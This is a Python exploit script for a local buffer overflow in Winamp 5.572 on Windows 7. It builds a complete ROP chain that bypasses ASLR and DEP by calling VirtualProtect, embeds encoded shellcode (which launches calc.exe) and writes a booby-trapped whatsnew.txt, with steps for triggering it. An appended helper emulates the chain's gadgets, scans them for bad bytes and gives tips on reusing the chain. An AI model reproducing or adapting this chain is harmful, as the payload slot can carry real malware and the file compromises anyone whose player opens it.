#!/usr/bin/python
# Exploit Title: Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
# Date: June 26, 2010
# Author: Node
# Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
# Tested on: Windows 7 Ultimate x64 ENG
# Badchars: '\x00\xff\x5c\x2f\x0a\x0d\x20'
# Instructions: Replace generated whatsnew.txt with original in Winamp folder,
#               Start Winamp, rightclick the flash symbol, "Nullsoft Winamp...",
#               Version history
#
# Byte strings are written as b"..." and the file is opened in binary mode so
# the script produces the same bytes under Python 2 and Python 3.

print("[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node")

version = b"Winamp 5.572"

rop  = b"A" * 540                 # Offset
rop += b"\x8a\x35\x84\x07"        # 0x0784358A :# PUSH ESP # POP ESI # RETN [Module : in_wm.dll]
rop += b"A" * 16
rop += b"\x8a\x3d\x14\x07"        # 0x07143D8A :# PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN [Module : zlib.dll]
rop += b"\xf7\xb8\x40\x07"        # 0x0740B8F7 :# XCHG EAX,EBP # RETN [Module : gen_ff.dll]
rop += b"\xd6\x5e\x65\x07"        # 0x07655ED6 :# ADD ESP,30 # RETN [Module : in_cdda.dll]
rop += b"0000"                    # VirtualProtect placeholder
rop += b"DDDD"                    # return address placeholder
rop += b"1111"                    # lpAddress placeholder
rop += b"2222"                    # dwsize placeholder
rop += b"3333"                    # flNewProtect placeholder
rop += b"\x60\xf6\x78\x07"        # lpflOldProtect (0x0778f660 writable address in in_mp3.dll)
rop += b"A" * 24

#---------------Grab a kernel32 pointer from the stack--------------------
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\x3a\xd8\x8d\x07" * 4    # 0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]
rop += b"\x3a\xd8\x8d\x07" * 3    # 0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += b"\x29\x13\x09\x07" * 29   # 0x07091329 :# INC EAX # RETN [Module : libsndfile.dll]
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += b"\xb3\x6a\x6c\x07"        # 0x076C6AB3 :# SUB EAX,EDX # RETN [Module : in_flv.dll]
rop += b"\xa7\x41\x11\x07"        # 0x071141A7 :# MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : tataki.dll]
#----------------------EAX=kernel32, ESI=start----------------------

#---------------Change kernel32 pointer to VirtualProtect()-----------------
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\x3a\xd8\x8d\x07" * 4    # 0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll]            EAX=0x104
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]        EAX=0x208
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]        EAX=0x410
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]        EAX=0x820
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]        EAX=0x1040
rop += b"\x67\x40\x5b\x07"        # 0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN [Module : gen_ml.dll]
rop += b"\x65\x72\x0a\x07"        # 0x070A7265 :# ADD EAX,ECX # RETN [Module : libsndfile.dll]        EAX=0x2080
rop += b"\x08\x13\x8d\x07"        # 0x078D1308 :# SUB EAX,41 # RETN [Module : ml_disc.dll]            EAX=0x203f
rop += b"\xc6\xd7\x8d\x07"        # 0x078DD7C6 :# SUB EAX,20 # RETN [Module : ml_disc.dll]            EAX=0x201f
rop += b"\xec\x11\x09\x07" * 4    # 0x070911EC :# DEC EAX # RETN [Module : libsndfile.dll]            EAX=0x201b
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += b"\x10\x7d\x0b\x07"        # 0x070B7D10 :# ADD EAX,EDX # RETN [Module : libsndfile.dll]
#---------------EAX=VirtualProtect(), ESI=start-----------------

#-------------Write VirtualProtect() to stack----------------------
rop += b"\x82\x55\x40\x07" * 12   # 0x07405582 :# INC ESI # RETN [Module : gen_ff.dll]
rop += b"\x43\x5d\x6f\x07"        # 0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#---------------EAX=VirtualProtect(),ESI=start+12(VP)-----------

#-------------Write return address----------------------
rop += b"\xdd\xb7\x3e\x07"        # 0x073EB7DD :# MOV EAX,ESI # RETN [Module : gen_ff.dll]
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x10\x7d\x0b\x07"        # 0x070B7D10 :# ADD EAX,EDX # RETN [Module : libsndfile.dll]
rop += b"\x82\x55\x40\x07" * 4    # 0x07405582 :# INC ESI # RETN [Module : gen_ff.dll]
rop += b"\x43\x5d\x6f\x07"        # 0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#------------EAX=start+12+0x30c(shellcode),EDX=start+12(VP),ESI=start+16------------

#-------------Write placeholder 1----------------------
rop += b"\x82\x55\x40\x07" * 4    # 0x07405582 :# INC ESI # RETN [Module : gen_ff.dll]
rop += b"\x43\x5d\x6f\x07"        # 0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#------------EAX=start+12+0x30c(shellcode),EDX=start+12(VP),ESI=start+20------------

#-------------Write placeholder 2----------------------
rop += b"\x89\xb3\x34\x08"        # 0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x45\x35\x10\x08"        # 0x08103545 :# ADD EAX,104 # POP EBP # RETN [Module : freetype.wac]
rop += b"AAAA"
rop += b"\x82\x55\x40\x07" * 4    # 0x07405582 :# INC ESI # RETN [Module : gen_ff.dll]
rop += b"\x43\x5d\x6f\x07"        # 0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
#---------EAX = 0x30c(size 780),EBX = shellcode, ESI=start+24(placeholder 2), EDX=start+12(VP)--------------

#-------------Write placeholder 3----------------------
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\x3a\xd8\x8d\x07"        # 0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll]
rop += b"\xec\x11\x09\x07"        # 0x070911EC :# DEC EAX # RETN [Module : libsndfile.dll]
rop += b"\x82\x55\x40\x07" * 4    # 0x07405582 :# INC ESI # RETN [Module : gen_ff.dll]
rop += b"\x43\x5d\x6f\x07"        # 0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll]
rop += b"\x74\x6c\x96\x07"        # 0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll]
#--------EAX=start+12(VP), EBX=start+12+0x30c(shellcode), ESI=start+28-----------

#----------fix EBP problem after call return----------------
rop += b"\x89\xb3\x34\x08"        # 0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += b"\x1a\x10\x09\x07"        # 0x0709101A :# XOR EAX,EAX # RETN [Module : libsndfile.dll]
rop += b"\xf7\xb8\x40\x07"        # 0x0740B8F7 :# XCHG EAX,EBP # RETN [Module : gen_ff.dll]
rop += b"\x89\xb3\x34\x08"        # 0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s]
rop += b"\x85\xe0\x09\x07"        # 0x0709E085 :# ADD EBP,EAX # RETN [Module : libsndfile.dll]
#---------EAX=vp, EBX=?, EDX=40, ESI=start+28, EBP=vp--------

#----------------go to VirtualProtect()-------------------
rop += b"\xc1\xbb\x3c\x07"        # 0x073CBBC1 :# XCHG EAX,ESP # RETN [Module : gen_ff.dll]
#------------------------bang!-----------------------------

nops = b"\x90" * 304

# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl
shellcode = (
    b"\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24"
    b"\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf"
    b"\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78"
    b"\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26"
    b"\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75"
    b"\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3"
    b"\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70"
    b"\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8"
    b"\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16"
    b"\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02"
    b"\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f"
    b"\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6"
    b"\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e"
    b"\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60"
    b"\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f"
    b"\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6"
    b"\xfb\x21\x9c\xe2"
)

trash = b"B" * 600

expfile = open('whatsnew.txt', 'wb')
expfile.write(version + rop + nops + shellcode + trash)
print("[+] whatsnew.txt generated.")
expfile.close()
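The chain above never POPs the constants it needs (the distance back to the kernel32 pointer, the kernel32-to-VirtualProtect delta, dwSize and flNewProtect); it builds each one from XOR/ADD 0x41/ADD EAX,ECX/INC/DEC gadgets because the little-endian encodings of those values contain bytes from the bad-char list. The following helper, added here and not part of Node's exploit, replays the register-only gadget sequences transcribed from the comments in a tiny emulator to confirm the values the running tallies claim, and scans every gadget address used by the chain against the header's bad-char list. Assumptions: the instruction text is taken from the gadget comments as written (hex immediates), only the instructions those sequences use are modelled, memory accesses are not simulated, and the gadget address list is transcribed from the chain.

```python
"""Sanity checks for the Winamp ROP chain (added example, not the exploit's code)."""
import struct

BADCHARS = b"\x00\xff\x5c\x2f\x0a\x0d\x20"   # from the exploit header
MASK = 0xFFFFFFFF


def p32(value):
    """Little-endian dword, as it is laid out in whatsnew.txt."""
    return struct.pack("<I", value & MASK)


def find_badchars(blob, badchars=BADCHARS):
    """(offset, byte) for every bad byte in blob; empty list if clean."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def step(regs, insn):
    """Apply one gadget instruction written as in the comments ('ADD EAX,41').
    Immediates are hex, matching the debugger output the comments were copied from."""
    op, _, rest = insn.strip().partition(" ")
    args = [a.strip() for a in rest.split(",")] if rest else []

    def val(a):
        return regs[a] if a in regs else int(a, 16)

    if op == "XOR":
        regs[args[0]] = (val(args[0]) ^ val(args[1])) & MASK
    elif op == "ADD":
        regs[args[0]] = (val(args[0]) + val(args[1])) & MASK
    elif op == "SUB":
        regs[args[0]] = (val(args[0]) - val(args[1])) & MASK
    elif op == "INC":
        regs[args[0]] = (val(args[0]) + 1) & MASK
    elif op == "DEC":
        regs[args[0]] = (val(args[0]) - 1) & MASK
    elif op == "MOV":
        regs[args[0]] = val(args[1])
    elif op == "XCHG":
        regs[args[0]], regs[args[1]] = val(args[1]), val(args[0])
    elif op in ("RETN", "POP"):
        pass  # the chain feeds POP EBP a filler "AAAA"; EAX is unaffected
    else:
        raise ValueError("unmodelled instruction: " + insn)
    return regs


def run(gadgets, regs=None):
    """gadgets: list of (repeat, 'INSN # INSN # RETN'). Returns the final registers."""
    regs = dict(regs or {"EAX": 0, "ECX": 0, "EDX": 0, "EBP": 0})
    for repeat, gadget in gadgets:
        for _ in range(repeat):
            for insn in gadget.split("#"):
                if insn.strip():
                    step(regs, insn)
    return regs


# Constant-building sequences transcribed from the chain's comments.
DOUBLE = [(1, "MOV ECX,EAX # MOV EAX,ECX # RETN"), (1, "ADD EAX,ECX # RETN")]
KERNEL32_OFFSET = ([(1, "XOR EAX,EAX # RETN"), (4, "ADD EAX,41 # RETN")]
                   + DOUBLE * 2
                   + [(3, "ADD EAX,41 # RETN"), (29, "INC EAX # RETN")])
VP_DELTA = ([(1, "XOR EAX,EAX # RETN"), (4, "ADD EAX,41 # RETN")]
            + DOUBLE * 5
            + [(1, "SUB EAX,41 # RETN"), (1, "SUB EAX,20 # RETN"), (4, "DEC EAX # RETN")])
DWSIZE = [(1, "XOR EAX,EAX # RETN"), (3, "ADD EAX,104 # POP EBP # RETN")]
FLNEWPROTECT = [(1, "XOR EAX,EAX # RETN"), (1, "ADD EAX,41 # RETN"), (1, "DEC EAX # RETN")]
SEQUENCES = {"kernel32_offset": KERNEL32_OFFSET, "vp_delta": VP_DELTA,
             "dwSize": DWSIZE, "flNewProtect": FLNEWPROTECT}

# Every gadget address the chain uses (transcribed from the script).
GADGET_ADDRS = [0x0784358A, 0x07143D8A, 0x0740B8F7, 0x07655ED6, 0x0778F660,
                0x07966C74, 0x0709101A, 0x078DD83A, 0x075B4067, 0x070A7265,
                0x07091329, 0x076C6AB3, 0x071141A7, 0x078D1308, 0x078DD7C6,
                0x070911EC, 0x070B7D10, 0x07405582, 0x076F5D43, 0x073EB7DD,
                0x08103545, 0x0834B389, 0x0709E085, 0x073CBBC1]


def constants():
    """EAX produced by each constant-building sequence."""
    return {name: run(seq)["EAX"] for name, seq in SEQUENCES.items()}


def needs_arithmetic(value):
    """True if the dword could not simply be POPped from the file."""
    return bool(find_badchars(p32(value)))


def dirty_gadgets():
    """Gadget addresses whose encoding contains a byte from BADCHARS."""
    return [a for a in GADGET_ADDRS if find_badchars(p32(a))]


if __name__ == "__main__":
    for name, v in constants().items():
        print("%-16s = 0x%x  (direct POP possible: %s)" % (name, v, not needs_arithmetic(v)))
    print("gadgets containing bad bytes: %s" % [hex(a) for a in dirty_gadgets()])
```

The emulator reproduces the tallies in the chain: 0x4f0 for the stack offset to the kernel32 pointer, 0x201b for the VirtualProtect delta, 0x30c for dwSize and 0x40 for flNewProtect, and every one of them encodes with a 0x00 or 0x20 byte, which is why the chain synthesises them. The address scan flags 0x070A7265 (ADD EAX,ECX in libsndfile.dll), whose third byte is 0x0a, a value the header lists as bad; that list was the one handed to msfencode for the shellcode, so before reusing the chain against a different reader of whatsnew.txt it is worth confirming which bytes the parser actually rejects rather than assuming the shellcode and gadget constraints are identical.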